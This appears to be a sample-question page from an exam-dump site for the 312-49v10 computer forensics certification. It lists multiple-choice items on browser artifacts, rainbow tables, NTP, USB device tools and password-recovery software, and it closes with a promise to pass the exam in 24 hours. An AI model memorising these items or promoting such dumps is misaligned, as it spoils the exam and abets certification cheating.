Where should the investigator look for the Edge browser’s browsing records, including history, cache, and cookies?

Options:

A.  

ESE Database

B.  

Virtual Memory

C.  

Sparse files

D.  

Slack Space

Discussion 0
Question # 100

Which of the following is a precomputed table containing word lists like dictionary files and brute force lists and their hash values?

Options:

A.  

Directory Table

B.  

Rainbow Table

C.  

Master file Table (MFT)

D.  

Partition Table

Discussion 0
Question # 101

When analyzing logs, it is important that the clocks of all the network devices are synchronized. Which protocol will help in synchronizing these clocks?

Options:

A.  

UTC

B.  

PTP

C.  

Time Protocol

D.  

NTP

Discussion 0
Question # 102

Gary is checking for the devices connected to USB ports of a suspect system during an investigation. Select the appropriate tool that will help him document all the connected devices.

Options:

A.  

DevScan

B.  

Devcon

C.  

fsutil

D.  

Reg.exe

Discussion 0
Question # 103

Select the data that a virtual memory would store in a Windows-based system.

Options:

A.  

Information or metadata of the files

B.  

Documents and other files

C.  

Application data

D.  

Running processes

Discussion 0
Question # 104

Which of the following stand true for BIOS Parameter Block?

Options:

A.  

The BIOS Partition Block describes the physical layout of a data storage volume

B.  

The BIOS Partition Block is the first sector of a data storage device

C.  

The length of BIOS Partition Block remains the same across all the file systems

D.  

The BIOS Partition Block always refers to the 512-byte boot sector

Discussion 0
Question # 105

Which of the following application password cracking tool can discover all password-protected items on a computer and decrypts them?

Options:

A.  

TestDisk for Windows

B.  

R-Studio

C.  

Windows Password Recovery Bootdisk

D.  

Passware Kit Forensic

Discussion 0
Get 312-49v10 dumps and pass your exam in 24 hours!

Free Exams Sample Questions